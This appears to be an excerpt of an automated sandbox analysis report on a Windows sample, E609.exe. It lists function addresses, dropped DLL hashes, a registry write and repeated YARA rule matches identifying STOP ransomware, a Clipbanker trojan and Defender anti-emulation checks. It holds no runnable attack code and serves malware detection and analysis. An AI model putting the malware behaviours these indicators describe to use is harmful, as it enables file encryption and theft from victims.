Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A7DBE0	14_2_04A7DBE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A80B00	14_2_04A80B00
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A72B60	14_2_04A72B60
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0042E003	15_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040D240	15_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0041E690	15_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040F730	15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00481920	15_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00419F90	15_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050D050	15_2_0050D050
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00405057	15_2_00405057
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040C070	15_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0042F010	15_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050D008	15_2_0050D008
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00408030	15_2_00408030
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050D028	15_2_0050D028
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004070E0	15_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050D090	15_2_0050D090
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050D0A8	15_2_0050D0A8
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00410160	15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004C8113	15_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004021C0	15_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004C9343	15_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0044237E	15_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00405447	15_2_00405447
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00405457	15_2_00405457
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004084C0	15_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050C4E0	15_2_0050C4E0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004344FF	15_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00449506	15_2_00449506
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0043E5A3	15_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0044B5B1	15_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040A660	15_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00409686	15_2_00409686
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00406740	15_2_00406740
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00402750	15_2_00402750
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040A710	15_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00408780	15_2_00408780
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0044D7A1	15_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0042C804	15_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00406880	15_2_00406880
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050C960	15_2_0050C960
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050C928	15_2_0050C928
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0044D9DC	15_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004069F3	15_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050C988	15_2_0050C988
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050C9A8	15_2_0050C9A8
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00449A71	15_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004E1AB0	15_2_004E1AB0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00443B40	15_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CB78	15_2_0050CB78
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00402B80	15_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00406B80	15_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00409CF9	15_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0044ACFF	15_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040DD40	15_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CD60	15_2_0050CD60
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040BDC0	15_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CDF0	15_2_0050CDF0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00409DFA	15_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CE58	15_2_0050CE58
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0042CE51	15_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00406EE0	15_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00409F76	15_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00420F30	15_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CF28	15_2_0050CF28
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CFC0	15_2_0050CFC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00449FE3	15_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0050CF90	15_2_0050CF90

Source: Joe Sandbox View	Dropped File: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 04AA0160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 04A98EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00428C81 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 04A40160 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 04A38EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 004547A0 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 0042F7C0 appears 129 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 0044F23E appears 108 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00428520 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00454E50 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: String function: 0044F26C appears 41 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876

Source: file.exe, 00000000.00000002.1709704213.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamesFilezera2 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
